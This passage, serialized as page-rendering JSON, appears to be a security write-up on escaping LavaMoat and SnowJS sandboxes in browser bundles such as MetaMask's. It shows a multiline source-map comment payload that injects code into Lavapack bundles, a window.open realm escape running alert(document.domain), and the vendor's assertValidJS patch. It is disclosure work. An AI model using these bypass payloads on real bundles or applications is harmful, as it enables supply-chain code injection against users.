convertSourceMap",{"type":25,"tag":216,"props":52642,"children":52643},{"style":6964},[52644],{"type":31,"value":179},{"type":25,"tag":216,"props":52646,"children":52647},{"style":7047},[52648],{"type":31,"value":52649},"fromSource",{"type":25,"tag":216,"props":52651,"children":52652},{"style":6964},[52653],{"type":31,"value":1850},{"type":25,"tag":216,"props":52655,"children":52656},{"style":6947},[52657],{"type":31,"value":41977},{"type":25,"tag":216,"props":52659,"children":52660},{"style":6964},[52661],{"type":31,"value":7107},{"type":25,"tag":216,"props":52663,"children":52664},{"class":6922,"line":6778},[52665],{"type":25,"tag":216,"props":52666,"children":52667},{"style":6927},[52668],{"type":31,"value":52669},"  // if (!converter) throw new Error('Unable to find original inlined sourcemap')\n",{"type":25,"tag":216,"props":52671,"children":52672},{"class":6922,"line":7005},[52673,52677,52682,52686,52690,52694,52698,52702,52707],{"type":25,"tag":216,"props":52674,"children":52675},{"style":6936},[52676],{"type":31,"value":40151},{"type":25,"tag":216,"props":52678,"children":52679},{"style":6947},[52680],{"type":31,"value":52681}," maps",{"type":25,"tag":216,"props":52683,"children":52684},{"style":6953},[52685],{"type":31,"value":6956},{"type":25,"tag":216,"props":52687,"children":52688},{"style":6947},[52689],{"type":31,"value":52631},{"type":25,"tag":216,"props":52691,"children":52692},{"style":6953},[52693],{"type":31,"value":18142},{"type":25,"tag":216,"props":52695,"children":52696},{"style":6947},[52697],{"type":31,"value":52631},{"type":25,"tag":216,"props":52699,"children":52700},{"style":6964},[52701],{"type":31,"value":179},{"type":25,"tag":216,"props":52703,"children":52704},{"style":7047},[52705],{"type":31,"value":52706},"toObject",{"type":25,"tag":216,"props":52708,"children":52709},{"style":6964},[52710],{"type":31,"value":11687},{"type":25,"tag":216,"props":52712,"children":52713},{"class":6922,"line":7110},[52714,52718,52723,52727,52731,52735,52740,52744,52748],{"type":25,"tag":216,"props":52715,"children":52716},{"style":6936},[52717],{"type":31,"value":40151},{"type":25,"tag":216,"props":52719,"children":52720},{"style":6947},[52721],{"type":31,"value":52722}," code",{"type":25,"tag":216,"props":52724,"children":52725},{"style":6953},[52726],{"type":31,"value":6956},{"type":25,"tag":216,"props":52728,"children":52729},{"style":6947},[52730],{"type":31,"value":52640},{"type":25,"tag":216,"props":52732,"children":52733},{"style":6964},[52734],{"type":31,"value":179},{"type":25,"tag":216,"props":52736,"children":52737},{"style":7047},[52738],{"type":31,"value":52739},"removeComments",{"type":25,"tag":216,"props":52741,"children":52742},{"style":6964},[52743],{"type":31,"value":1850},{"type":25,"tag":216,"props":52745,"children":52746},{"style":6947},[52747],{"type":31,"value":41977},{"type":25,"tag":216,"props":52749,"children":52750},{"style":6964},[52751],{"type":31,"value":7107},{"type":25,"tag":216,"props":52753,"children":52754},{"class":6922,"line":7216},[52755,52759,52763,52767,52771,52776],{"type":25,"tag":216,"props":52756,"children":52757},{"style":6973},[52758],{"type":31,"value":43162},{"type":25,"tag":216,"props":52760,"children":52761},{"style":6964},[52762],{"type":31,"value":13542},{"type":25,"tag":216,"props":52764,"children":52765},{"style":6947},[52766],{"type":31,"value":82},{"type":25,"tag":216,"props":52768,"children":52769},{"style":6964},[52770],{"type":31,"value":7026},{"type":25,"tag":216,"props":52772,"children":52773},{"style":6947},[52774],{"type":31,"value":52775},"maps",{"type":25,"tag":216,"props":52777,"children":52778},{"style":6964},[52779],{"type":31,"value":13552},{"type":25,"tag":216,"props":52781,"children":52782},{"class":6922,"line":7244},[52783],{"type":25,"tag":216,"props":52784,"children":52785},{"style":6964},[52786],{"type":31,"value":7874},{"type":25,"tag":38,"props":52788,"children":52789},{},[52790,52792,52797,52799,52804],{"type":31,"value":52791},"This code removes the source map comments of the source code, meaning that there actually is a modification of source code in Lavapack after the ",{"type":25,"tag":82,"props":52793,"children":52795},{"className":52794},[],[52796],{"type":31,"value":52234},{"type":31,"value":52798}," stage. Reviewing the ",{"type":25,"tag":82,"props":52800,"children":52802},{"className":52801},[],[52803],{"type":31,"value":52586},{"type":31,"value":52805}," code, we can see exactly how this happens.",{"type":25,"tag":206,"props":52807,"children":52809},{"className":35325,"code":52808,"language":35327,"meta":7,"style":7},"Object.defineProperty(exports, 'commentRegex', {\n  get: function getCommentRegex () {\n    // Groups: 1: media type, 2: MIME type, 3: charset, 4: encoding, 5: data.\n    return /^\\s*?\\/[\\/\\*][@#]\\s+?sourceMappingURL=data:(((?:application|text)\\/json)(?:;charset=([^;,]+?)?)?)?(?:;(base64))?,(.*?)$/mg;\n  }\n});\n\nexports.removeComments = function (src) {\n  return src.replace(exports.commentRegex, '');\n};\n",[52810],{"type":25,"tag":82,"props":52811,"children":52812},{"__ignoreMap":7},[52813,52852,52878,52886,53100,53107,53114,53121,53156,53206],{"type":25,"tag":216,"props":52814,"children":52815},{"class":6922,"line":6923},[52816,52821,52825,52830,52834,52838,52842,52847],{"type":25,"tag":216,"props":52817,"children":52818},{"style":6947},[52819],{"type":31,"value":52820},"Object",{"type":25,"tag":216,"props":52822,"children":52823},{"style":6964},[52824],{"type":31,"value":179},{"type":25,"tag":216,"props":52826,"children":52827},{"style":7047},[52828],{"type":31,"value":52829},"defineProperty",{"type":25,"tag":216,"props":52831,"children":52832},{"style":6964},[52833],{"type":31,"value":1850},{"type":25,"tag":216,"props":52835,"children":52836},{"style":7375},[52837],{"type":31,"value":41849},{"type":25,"tag":216,"props":52839,"children":52840},{"style":6964},[52841],{"type":31,"value":7026},{"type":25,"tag":216,"props":52843,"children":52844},{"style":8205},[52845],{"type":31,"value":52846},"'commentRegex'",{"type":25,"tag":216,"props":52848,"children":52849},{"style":6964},[52850],{"type":31,"value":52851},", {\n",{"type":25,"tag":216,"props":52853,"children":52854},{"class":6922,"line":6769},[52855,52860,52864,52868,52873],{"type":25,"tag":216,"props":52856,"children":52857},{"style":7047},[52858],{"type":31,"value":52859},"  get",{"type":25,"tag":216,"props":52861,"children":52862},{"style":6947},[52863],{"type":31,"value":1472},{"type":25,"tag":216,"props":52865,"children":52866},{"style":6936},[52867],{"type":31,"value":42177},{"type":25,"tag":216,"props":52869,"children":52870},{"style":7047},[52871],{"type":31,"value":52872}," getCommentRegex",{"type":25,"tag":216,"props":52874,"children":52875},{"style":6964},[52876],{"type":31,"value":52877}," () {\n",{"type":25,"tag":216,"props":52879,"children":52880},{"class":6922,"line":6778},[52881],{"type":25,"tag":216,"props":52882,"children":52883},{"style":6927},[52884],{"type":31,"value":52885},"    // Groups: 1: media type, 2: MIME type, 3: charset, 4: encoding, 5: data.\n",{"type":25,"tag":216,"props":52887,"children":52888},{"class":6922,"line":7005},[52889,52893,52899,52904,52909,52914,52918,52923,52928,52933,52937,52941,52946,52951,52956,52961,52965,52969,52973,52978,52982,52987,52992,52997,53002,53006,53010,53014,53018,53022,53026,53030,53034,53039,53044,53048,53053,53058,53062,53066,53070,53074,53079,53083,53087,53091,53096],{"type":25,"tag":216,"props":52890,"children":52891},{"style":6973},[52892],{"type":31,"value":20947},{"type":25,"tag":216,"props":52894,"children":52896},{"style":52895},"--shiki-default:#D16969",[52897],{"type":31,"value":52898}," /",{"type":25,"tag":216,"props":52900,"children":52901},{"style":7047},[52902],{"type":31,"value":52903},"^",{"type":25,"tag":216,"props":52905,"children":52906},{"style":52895},[52907],{"type":31,"value":52908},"\\s",{"type":25,"tag":216,"props":52910,"children":52911},{"style":52342},[52912],{"type":31,"value":52913},"*?\\/",{"type":25,"tag":216,"props":52915,"children":52916},{"style":8205},[52917],{"type":31,"value":7701},{"type":25,"tag":216,"props":52919,"children":52920},{"style":52342},[52921],{"type":31,"value":52922},"\\/\\*",{"type":25,"tag":216,"props":52924,"children":52925},{"style":8205},[52926],{"type":31,"value":52927},"][",{"type":25,"tag":216,"props":52929,"children":52930},{"style":52895},[52931],{"type":31,"value":52932},"@#",{"type":25,"tag":216,"props":52934,"children":52935},{"style":8205},[52936],{"type":31,"value":19368},{"type":25,"tag":216,"props":52938,"children":52939},{"style":52895},[52940],{"type":31,"value":52908},{"type":25,"tag":216,"props":52942,"children":52943},{"style":52342},[52944],{"type":31,"value":52945},"+?",{"type":25,"tag":216,"props":52947,"children":52948},{"style":52895},[52949],{"type":31,"value":52950},"sourceMappingURL=data:",{"type":25,"tag":216,"props":52952,"children":52953},{"style":8205},[52954],{"type":31,"value":52955},"(((?:",{"type":25,"tag":216,"props":52957,"children":52958},{"style":52895},[52959],{"type":31,"value":52960},"application",{"type":25,"tag":216,"props":52962,"children":52963},{"style":7047},[52964],{"type":31,"value":14373},{"type":25,"tag":216,"props":52966,"children":52967},{"style":52895},[52968],{"type":31,"value":31},{"type":25,"tag":216,"props":52970,"children":52971},{"style":8205},[52972],{"type":31,"value":1888},{"type":25,"tag":216,"props":52974,"children":52975},{"style":52342},[52976],{"type":31,"value":52977},"\\/",{"type":25,"tag":216,"props":52979,"children":52980},{"style":52895},[52981],{"type":31,"value":37960},{"type":25,"tag":216,"props":52983,"children":52984},{"style":8205},[52985],{"type":31,"value":52986},")(?:",{"type":25,"tag":216,"props":52988,"children":52989},{"style":52895},[52990],{"type":31,"value":52991},";charset=",{"type":25,"tag":216,"props":52993,"children":52994},{"style":8205},[52995],{"type":31,"value":52996},"([^",{"type":25,"tag":216,"props":52998,"children":52999},{"style":52895},[53000],{"type":31,"value":53001},";,",{"type":25,"tag":216,"props":53003,"children":53004},{"style":8205},[53005],{"type":31,"value":19368},{"type":25,"tag":216,"props":53007,"children":53008},{"style":52342},[53009],{"type":31,"value":52945},{"type":25,"tag":216,"props":53011,"children":53012},{"style":8205},[53013],{"type":31,"value":1888},{"type":25,"tag":216,"props":53015,"children":53016},{"style":52342},[53017],{"type":31,"value":604},{"type":25,"tag":216,"props":53019,"children":53020},{"style":8205},[53021],{"type":31,"value":1888},{"type":25,"tag":216,"props":53023,"children":53024},{"style":52342},[53025],{"type":31,"value":604},{"type":25,"tag":216,"props":53027,"children":53028},{"style":8205},[53029],{"type":31,"value":1888},{"type":25,"tag":216,"props":53031,"children":53032},{"style":52342},[53033],{"type":31,"value":604},{"type":25,"tag":216,"props":53035,"children":53036},{"style":8205},[53037],{"type":31,"value":53038},"(?:",{"type":25,"tag":216,"props":53040,"children":53041},{"style":52895},[53042],{"type":31,"value":53043},";",{"type":25,"tag":216,"props":53045,"children":53046},{"style":8205},[53047],{"type":31,"value":1850},{"type":25,"tag":216,"props":53049,"children":53050},{"style":52895},[53051],{"type":31,"value":53052},"base64",{"type":25,"tag":216,"props":53054,"children":53055},{"style":8205},[53056],{"type":31,"value":53057},"))",{"type":25,"tag":216,"props":53059,"children":53060},{"style":52342},[53061],{"type":31,"value":604},{"type":25,"tag":216,"props":53063,"children":53064},{"style":52895},[53065],{"type":31,"value":1867},{"type":25,"tag":216,"props":53067,"children":53068},{"style":8205},[53069],{"type":31,"value":1850},{"type":25,"tag":216,"props":53071,"children":53072},{"style":52895},[53073],{"type":31,"value":179},{"type":25,"tag":216,"props":53075,"children":53076},{"style":52342},[53077],{"type":31,"value":53078},"*?",{"type":25,"tag":216,"props":53080,"children":53081},{"style":8205},[53082],{"type":31,"value":1888},{"type":25,"tag":216,"props":53084,"children":53085},{"style":7047},[53086],{"type":31,"value":14245},{"type":25,"tag":216,"props":53088,"children":53089},{"style":52895},[53090],{"type":31,"value":5755},{"type":25,"tag":216,"props":53092,"children":53093},{"style":6936},[53094],{"type":31,"value":53095},"mg",{"type":25,"tag":216,"props":53097,"children":53098},{"style":6964},[53099],{"type":31,"value":6967},{"type":25,"tag":216,"props":53101,"children":53102},{"class":6922,"line":7110},[53103],{"type":25,"tag":216,"props":53104,"children":53105},{"style":6964},[53106],{"type":31,"value":9823},{"type":25,"tag":216,"props":53108,"children":53109},{"class":6922,"line":7216},[53110],{"type":25,"tag":216,"props":53111,"children":53112},{"style":6964},[53113],{"type":31,"value":39301},{"type":25,"tag":216,"props":53115,"children":53116},{"class":6922,"line":7244},[53117],{"type":25,"tag":216,"props":53118,"children":53119},{"emptyLinePlaceholder":16},[53120],{"type":31,"value":7642},{"type":25,"tag":216,"props":53122,"children":53123},{"class":6922,"line":7257},[53124,53128,53132,53136,53140,53144,53148,53152],{"type":25,"tag":216,"props":53125,"children":53126},{"style":7375},[53127],{"type":31,"value":41849},{"type":25,"tag":216,"props":53129,"children":53130},{"style":6964},[53131],{"type":31,"value":179},{"type":25,"tag":216,"props":53133,"children":53134},{"style":7047},[53135],{"type":31,"value":52739},{"type":25,"tag":216,"props":53137,"children":53138},{"style":6953},[53139],{"type":31,"value":6956},{"type":25,"tag":216,"props":53141,"children":53142},{"style":6936},[53143],{"type":31,"value":42177},{"type":25,"tag":216,"props":53145,"children":53146},{"style":6964},[53147],{"type":31,"value":7016},{"type":25,"tag":216,"props":53149,"children":53150},{"style":6947},[53151],{"type":31,"value":36632},{"type":25,"tag":216,"props":53153,"children":53154},{"style":6964},[53155],{"type":31,"value":18761},{"type":25,"tag":216,"props":53157,"children":53158},{"class":6922,"line":7275},[53159,53163,53167,53171,53176,53180,53184,53188,53193,53197,53202],{"type":25,"tag":216,"props":53160,"children":53161},{"style":6973},[53162],{"type":31,"value":43162},{"type":25,"tag":216,"props":53164,"children":53165},{"style":6947},[53166],{"type":31,"value":52330},{"type":25,"tag":216,"props":53168,"children":53169},{"style":6964},[53170],{"type":31,"value":179},{"type":25,"tag":216,"props":53172,"children":53173},{"style":7047},[53174],{"type":31,"value":53175},"replace",{"type":25,"tag":216,"props":53177,"children":53178},{"style":6964},[53179],{"type":31,"value":1850},{"type":25,"tag":216,"props":53181,"children":53182},{"style":7375},[53183],{"type":31,"value":41849},{"type":25,"tag":216,"props":53185,"children":53186},{"style":6964},[53187],{"type":31,"value":179},{"type":25,"tag":216,"props":53189,"children":53190},{"style":6947},[53191],{"type":31,"value":53192},"commentRegex",{"type":25,"tag":216,"props":53194,"children":53195},{"style":6964},[53196],{"type":31,"value":7026},{"type":25,"tag":216,"props":53198,"children":53199},{"style":8205},[53200],{"type":31,"value":53201},"''",{"type":25,"tag":216,"props":53203,"children":53204},{"style":6964},[53205],{"type":31,"value":7797},{"type":25,"tag":216,"props":53207,"children":53208},{"class":6922,"line":7296},[53209],{"type":25,"tag":216,"props":53210,"children":53211},{"style":6964},[53212],{"type":31,"value":20536},{"type":25,"tag":38,"props":53214,"children":53215},{},[53216,53218,53224],{"type":31,"value":53217},"Looking deeper at the RegEx, it matches the start of the multiple line comment (",{"type":25,"tag":82,"props":53219,"children":53221},{"className":53220},[],[53222],{"type":31,"value":53223},"/*",{"type":31,"value":53225},") but doesn't match the end of it, meaning that the syntax would break in the case of multiline source map comments.",{"type":25,"tag":606,"props":53227,"children":53229},{"id":53228},"the-bypass",[53230],{"type":31,"value":53231},"The Bypass",{"type":25,"tag":38,"props":53233,"children":53234},{},[53235,53237,53242,53244,53249],{"type":31,"value":53236},"By abusing the ",{"type":25,"tag":82,"props":53238,"children":53240},{"className":53239},[],[53241],{"type":31,"value":52739},{"type":31,"value":53243}," function, we could bypass the Lavamoat restrictions by escaping the ",{"type":25,"tag":82,"props":53245,"children":53247},{"className":53246},[],[53248],{"type":31,"value":52083},{"type":31,"value":53250}," sandbox. To do so, we created a multiline source map comment, and injected the invalid javascript inside the comment:",{"type":25,"tag":206,"props":53252,"children":53254},{"className":35325,"code":53253,"language":35327,"meta":7,"style":7},"/*# sourceMappingURL=data:,{}\n\n}}}}\n}, {\n    package: \"xpl\",\n    file: \"node_modules/xpl/index.js\",\n    test: alert(document.domain),\n    test1: () => { () => { () => { () => {\n\n/*\n*/\n",[53255],{"type":25,"tag":82,"props":53256,"children":53257},{"__ignoreMap":7},[53258,53266,53273,53281,53289,53297,53305,53313,53321,53328,53336],{"type":25,"tag":216,"props":53259,"children":53260},{"class":6922,"line":6923},[53261],{"type":25,"tag":216,"props":53262,"children":53263},{"style":6927},[53264],{"type":31,"value":53265},"/*# sourceMappingURL=data:,{}\n",{"type":25,"tag":216,"props":53267,"children":53268},{"class":6922,"line":6769},[53269],{"type":25,"tag":216,"props":53270,"children":53271},{"emptyLinePlaceholder":16},[53272],{"type":31,"value":7642},{"type":25,"tag":216,"props":53274,"children":53275},{"class":6922,"line":6778},[53276],{"type":25,"tag":216,"props":53277,"children":53278},{"style":6927},[53279],{"type":31,"value":53280},"}}}}\n",{"type":25,"tag":216,"props":53282,"children":53283},{"class":6922,"line":7005},[53284],{"type":25,"tag":216,"props":53285,"children":53286},{"style":6927},[53287],{"type":31,"value":53288},"}, {\n",{"type":25,"tag":216,"props":53290,"children":53291},{"class":6922,"line":7110},[53292],{"type":25,"tag":216,"props":53293,"children":53294},{"style":6927},[53295],{"type":31,"value":53296},"    package: \"xpl\",\n",{"type":25,"tag":216,"props":53298,"children":53299},{"class":6922,"line":7216},[53300],{"type":25,"tag":216,"props":53301,"children":53302},{"style":6927},[53303],{"type":31,"value":53304},"    file: \"node_modules/xpl/index.js\",\n",{"type":25,"tag":216,"props":53306,"children":53307},{"class":6922,"line":7244},[53308],{"type":25,"tag":216,"props":53309,"children":53310},{"style":6927},[53311],{"type":31,"value":53312},"    test: alert(document.domain),\n",{"type":25,"tag":216,"props":53314,"children":53315},{"class":6922,"line":7257},[53316],{"type":25,"tag":216,"props":53317,"children":53318},{"style":6927},[53319],{"type":31,"value":53320},"    test1: () => { () => { () => { () => {\n",{"type":25,"tag":216,"props":53322,"children":53323},{"class":6922,"line":7275},[53324],{"type":25,"tag":216,"props":53325,"children":53326},{"emptyLinePlaceholder":16},[53327],{"type":31,"value":7642},{"type":25,"tag":216,"props":53329,"children":53330},{"class":6922,"line":7296},[53331],{"type":25,"tag":216,"props":53332,"children":53333},{"style":6927},[53334],{"type":31,"value":53335},"/*\n",{"type":25,"tag":216,"props":53337,"children":53338},{"class":6922,"line":7305},[53339],{"type":25,"tag":216,"props":53340,"children":53341},{"style":6927},[53342],{"type":31,"value":53343},"*/\n",{"type":25,"tag":38,"props":53345,"children":53346},{},[53347],{"type":31,"value":53348},"This allows malicious code to execute without breaking any other package or feature. This payload also makes the supply chain attack more impactful. Any injected code is executed as soon as the bundle file is imported.",{"type":25,"tag":606,"props":53350,"children":53352},{"id":53351},"lavapack-patch",[53353],{"type":31,"value":53354},"Lavapack Patch",{"type":25,"tag":38,"props":53356,"children":53357},{},[53358,53360,53366],{"type":31,"value":53359},"Metamask mitigated the issues we reported on Lavapack by defining ",{"type":25,"tag":82,"props":53361,"children":53363},{"className":53362},[],[53364],{"type":31,"value":53365},"assertValidJS",{"type":31,"value":53367},", an independent check that differs from the browserify syntax check we used to exploit the issue.",{"type":25,"tag":38,"props":53369,"children":53370},{},[53371,53373,53380],{"type":31,"value":53372},"The patch was introduced in commit ",{"type":25,"tag":162,"props":53374,"children":53377},{"href":53375,"rel":53376},"https://github.com/LavaMoat/LavaMoat/commit/9c38cd47e7875dde53349dd34971c74ce34004d9",[166],[53378],{"type":31,"value":53379},"9c38cd4",{"type":31,"value":179},{"type":25,"tag":206,"props":53382,"children":53384},{"className":44324,"code":53383,"language":44326,"meta":7,"style":7},"+ function assertValidJS(code) {\n+  try {\n+    new Function(code)\n+  } catch (err) {\n+    throw new Error(`Invalid JavaScript: ${err.message}`)\n+  }\n+ }\n\n+  // additional layer of syntax checking independent of browserify\n+  assertValidJS(sourceMeta.code) \n\n",[53385],{"type":25,"tag":82,"props":53386,"children":53387},{"__ignoreMap":7},[53388,53396,53404,53412,53420,53428,53436,53444,53451,53459],{"type":25,"tag":216,"props":53389,"children":53390},{"class":6922,"line":6923},[53391],{"type":25,"tag":216,"props":53392,"children":53393},{"style":6989},[53394],{"type":31,"value":53395},"+ function assertValidJS(code) {\n",{"type":25,"tag":216,"props":53397,"children":53398},{"class":6922,"line":6769},[53399],{"type":25,"tag":216,"props":53400,"children":53401},{"style":6989},[53402],{"type":31,"value":53403},"+  try {\n",{"type":25,"tag":216,"props":53405,"children":53406},{"class":6922,"line":6778},[53407],{"type":25,"tag":216,"props":53408,"children":53409},{"style":6989},[53410],{"type":31,"value":53411},"+    new Function(code)\n",{"type":25,"tag":216,"props":53413,"children":53414},{"class":6922,"line":7005},[53415],{"type":25,"tag":216,"props":53416,"children":53417},{"style":6989},[53418],{"type":31,"value":53419},"+  } catch (err) {\n",{"type":25,"tag":216,"props":53421,"children":53422},{"class":6922,"line":7110},[53423],{"type":25,"tag":216,"props":53424,"children":53425},{"style":6989},[53426],{"type":31,"value":53427},"+    throw new Error(`Invalid JavaScript: ${err.message}`)\n",{"type":25,"tag":216,"props":53429,"children":53430},{"class":6922,"line":7216},[53431],{"type":25,"tag":216,"props":53432,"children":53433},{"style":6989},[53434],{"type":31,"value":53435},"+  }\n",{"type":25,"tag":216,"props":53437,"children":53438},{"class":6922,"line":7244},[53439],{"type":25,"tag":216,"props":53440,"children":53441},{"style":6989},[53442],{"type":31,"value":53443},"+ }\n",{"type":25,"tag":216,"props":53445,"children":53446},{"class":6922,"line":7257},[53447],{"type":25,"tag":216,"props":53448,"children":53449},{"emptyLinePlaceholder":16},[53450],{"type":31,"value":7642},{"type":25,"tag":216,"props":53452,"children":53453},{"class":6922,"line":7275},[53454],{"type":25,"tag":216,"props":53455,"children":53456},{"style":6989},[53457],{"type":31,"value":53458},"+  // additional layer of syntax checking independent of browserify\n",{"type":25,"tag":216,"props":53460,"children":53461},{"class":6922,"line":7296},[53462],{"type":25,"tag":216,"props":53463,"children":53464},{"style":6989},[53465],{"type":31,"value":53466},"+  assertValidJS(sourceMeta.code)\n",{"type":25,"tag":26,"props":53468,"children":53470},{"id":53469},"hacking-js-realms",[53471],{"type":31,"value":53472},"Hacking JS Realms",{"type":25,"tag":38,"props":53474,"children":53475},{},[53476,53478,53483],{"type":31,"value":53477},"Lavamoat scuttling removes unnecessary and dangerous attributes from the ",{"type":25,"tag":82,"props":53479,"children":53481},{"className":53480},[],[53482],{"type":31,"value":41380},{"type":31,"value":53484}," object. However, this can be easily bypassed when Lavamoat is running in a browser context.",{"type":25,"tag":206,"props":53486,"children":53488},{"className":35325,"code":53487,"language":35327,"meta":7,"style":7},"const w = window.open('/non_existent');\nw.alert(document.domain)\n",[53489],{"type":25,"tag":82,"props":53490,"children":53491},{"__ignoreMap":7},[53492,53534],{"type":25,"tag":216,"props":53493,"children":53494},{"class":6922,"line":6923},[53495,53499,53504,53508,53512,53516,53521,53525,53530],{"type":25,"tag":216,"props":53496,"children":53497},{"style":6936},[53498],{"type":31,"value":13611},{"type":25,"tag":216,"props":53500,"children":53501},{"style":6947},[53502],{"type":31,"value":53503}," w",{"type":25,"tag":216,"props":53505,"children":53506},{"style":6953},[53507],{"type":31,"value":6956},{"type":25,"tag":216,"props":53509,"children":53510},{"style":6947},[53511],{"type":31,"value":35370},{"type":25,"tag":216,"props":53513,"children":53514},{"style":6964},[53515],{"type":31,"value":179},{"type":25,"tag":216,"props":53517,"children":53518},{"style":7047},[53519],{"type":31,"value":53520},"open",{"type":25,"tag":216,"props":53522,"children":53523},{"style":6964},[53524],{"type":31,"value":1850},{"type":25,"tag":216,"props":53526,"children":53527},{"style":8205},[53528],{"type":31,"value":53529},"'/non_existent'",{"type":25,"tag":216,"props":53531,"children":53532},{"style":6964},[53533],{"type":31,"value":7797},{"type":25,"tag":216,"props":53535,"children":53536},{"class":6922,"line":6769},[53537,53541,53545,53549,53553,53557,53561,53565],{"type":25,"tag":216,"props":53538,"children":53539},{"style":6947},[53540],{"type":31,"value":2470},{"type":25,"tag":216,"props":53542,"children":53543},{"style":6964},[53544],{"type":31,"value":179},{"type":25,"tag":216,"props":53546,"children":53547},{"style":7047},[53548],{"type":31,"value":36660},{"type":25,"tag":216,"props":53550,"children":53551},{"style":6964},[53552],{"type":31,"value":1850},{"type":25,"tag":216,"props":53554,"children":53555},{"style":6947},[53556],{"type":31,"value":36670},{"type":25,"tag":216,"props":53558,"children":53559},{"style":6964},[53560],{"type":31,"value":179},{"type":25,"tag":216,"props":53562,"children":53563},{"style":6947},[53564],{"type":31,"value":36680},{"type":25,"tag":216,"props":53566,"children":53567},{"style":6964},[53568],{"type":31,"value":7107},{"type":25,"tag":38,"props":53570,"children":53571},{},[53572,53574,53579],{"type":31,"value":53573},"This opens a new window with a new JS Realm (another ",{"type":25,"tag":82,"props":53575,"children":53577},{"className":53576},[],[53578],{"type":31,"value":41380},{"type":31,"value":53580}," object), and uses it to execute code in the context of the scuttled window. Note that the window needs to be same-origin and must not be scuttled.",{"type":25,"tag":38,"props":53582,"children":53583},{},[53584,53586,53593],{"type":31,"value":53585},"As a mitigation, some applications integrate SnowJS with scuttling, so every new same-origin window and iframe will be detected and scuttled (check the ",{"type":25,"tag":162,"props":53587,"children":53590},{"href":53588,"rel":53589},"https://github.com/MetaMask/metamask-extension/blob/3996f505a6a156d96077acb49579e6fc9e78cd45/app/scripts/use-snow.js#L22",[166],[53591],{"type":31,"value":53592},"Metamask implementation",{"type":31,"value":1888},{"type":25,"tag":606,"props":53595,"children":53597},{"id":53596},"snowjs-attack-surface",[53598],{"type":31,"value":53599},"SnowJS Attack Surface",{"type":25,"tag":38,"props":53601,"children":53602},{},[53603],{"type":31,"value":53604},"SnowJS is a javascript sandbox implementation that secures same-origin realms in browser applications. It is configured to detect new realms and attach them to the sandbox.",{"type":25,"tag":38,"props":53606,"children":53607},{},[53608,53610,53617],{"type":31,"value":53609},"As a mechanism, it hooks functions that can be used to create realms (an iframe, for example). For example, here are some of the ",{"type":25,"tag":162,"props":53611,"children":53614},{"href":53612,"rel":53613},"https://github.com/LavaMoat/snow/blob/ecf1add05c774b90b8baeff934b2e40585e13ca4/src/inserters.js#L9",[166],[53615],{"type":31,"value":53616},"hooked inserters",{"type":31,"value":53618}," functions:",{"type":25,"tag":206,"props":53620,"children":53622},{"className":35325,"code":53621,"language":35327,"meta":7,"style":7},"const map = {\n    Range: ['insertNode'],\n    DocumentFragment: ['replaceChildren', 'append', 'prepend'],\n    Document: ['replaceChildren', 'append', 'prepend', 'write', 'writeln'],\n    Node: ['appendChild', 'insertBefore', 'replaceChild'],\n    Element: ['innerHTML', 'outerHTML', 'insertAdjacentHTML', 'replaceWith', 'insertAdjacentElement', 'append', 'before', 'prepend', 'after', 'replaceChildren'],\n    ShadowRoot: ['innerHTML'],\n    HTMLIFrameElement: ['srcdoc'],\n};\n",[53623],{"type":25,"tag":82,"props":53624,"children":53625},{"__ignoreMap":7},[53626,53646,53667,53706,53760,53799,53898,53918,53939],{"type":25,"tag":216,"props":53627,"children":53628},{"class":6922,"line":6923},[53629,53633,53638,53642],{"type":25,"tag":216,"props":53630,"children":53631},{"style":6936},[53632],{"type":31,"value":13611},{"type":25,"tag":216,"props":53634,"children":53635},{"style":6947},[53636],{"type":31,"value":53637}," map",{"type":25,"tag":216,"props":53639,"children":53640},{"style":6953},[53641],{"type":31,"value":6956},{"type":25,"tag":216,"props":53643,"children":53644},{"style":6964},[53645],{"type":31,"value":7241},{"type":25,"tag":216,"props":53647,"children":53648},{"class":6922,"line":6769},[53649,53654,53658,53663],{"type":25,"tag":216,"props":53650,"children":53651},{"style":6947},[53652],{"type":31,"value":53653},"    Range:",{"type":25,"tag":216,"props":53655,"children":53656},{"style":6964},[53657],{"type":31,"value":26978},{"type":25,"tag":216,"props":53659,"children":53660},{"style":8205},[53661],{"type":31,"value":53662},"'insertNode'",{"type":25,"tag":216,"props":53664,"children":53665},{"style":6964},[53666],{"type":31,"value":18220},{"type":25,"tag":216,"props":53668,"children":53669},{"class":6922,"line":6778},[53670,53675,53679,53684,53688,53693,53697,53702],{"type":25,"tag":216,"props":53671,"children":53672},{"style":6947},[53673],{"type":31,"value":53674},"    DocumentFragment:",{"type":25,"tag":216,"props":53676,"children":53677},{"style":6964},[53678],{"type":31,"value":26978},{"type":25,"tag":216,"props":53680,"children":53681},{"style":8205},[53682],{"type":31,"value":53683},"'replaceChildren'",{"type":25,"tag":216,"props":53685,"children":53686},{"style":6964},[53687],{"type":31,"value":7026},{"type":25,"tag":216,"props":53689,"children":53690},{"style":8205},[53691],{"type":31,"value":53692},"'append'",{"type":25,"tag":216,"props":53694,"children":53695},{"style":6964},[53696],{"type":31,"value":7026},{"type":25,"tag":216,"props":53698,"children":53699},{"style":8205},[53700],{"type":31,"value":53701},"'prepend'",{"type":25,"tag":216,"props":53703,"children":53704},{"style":6964},[53705],{"type":31,"value":18220},{"type":25,"tag":216,"props":53707,"children":53708},{"class":6922,"line":7005},[53709,53714,53718,53722,53726,53730,53734,53738,53742,53747,53751,53756],{"type":25,"tag":216,"props":53710,"children":53711},{"style":6947},[53712],{"type":31,"value":53713},"    Document:",{"type":25,"tag":216,"props":53715,"children":53716},{"style":6964},[53717],{"type":31,"value":26978},{"type":25,"tag":216,"props":53719,"children":53720},{"style":8205},[53721],{"type":31,"value":53683},{"type":25,"tag":216,"props":53723,"children":53724},{"style":6964},[53725],{"type":31,"value":7026},{"type":25,"tag":216,"props":53727,"children":53728},{"style":8205},[53729],{"type":31,"value":53692},{"type":25,"tag":216,"props":53731,"children":53732},{"style":6964},[53733],{"type":31,"value":7026},{"type":25,"tag":216,"props":53735,"children":53736},{"style":8205},[53737],{"type":31,"value":53701},{"type":25,"tag":216,"props":53739,"children":53740},{"style":6964},[53741],{"type":31,"value":7026},{"type":25,"tag":216,"props":53743,"children":53744},{"style":8205},[53745],{"type":31,"value":53746},"'write'",{"type":25,"tag":216,"props":53748,"children":53749},{"style":6964},[53750],{"type":31,"value":7026},{"type":25,"tag":216,"props":53752,"children":53753},{"style":8205},[53754],{"type":31,"value":53755},"'writeln'",{"type":25,"tag":216,"props":53757,"children":53758},{"style":6964},[53759],{"type":31,"value":18220},{"type":25,"tag":216,"props":53761,"children":53762},{"class":6922,"line":7110},[53763,53768,53772,53777,53781,53786,53790,53795],{"type":25,"tag":216,"props":53764,"